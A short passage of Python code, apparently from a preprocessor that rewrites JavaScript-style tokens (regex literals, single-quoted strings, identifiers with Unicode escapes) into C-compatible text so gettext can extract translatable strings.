            # C has no regex literals and gettext does not need them.
            text = '"REGEX"'
        elif kind == 'string' and text.startswith("'"):
            # C has no single-quoted strings: swap the delimiters and escape
            # any double quotes that were legal inside the original.
            text = '"' + re.sub(r"\\.|.", requote, text[1:-1]) + '"'
        elif kind == 'id':
            # Unicode escapes are not valid in C identifiers; neutralise them.
            text = text.replace("\\", "U")
        pieces.append(text)
    return ''.join(pieces)
231 |
--------------------------------------------------------------------------------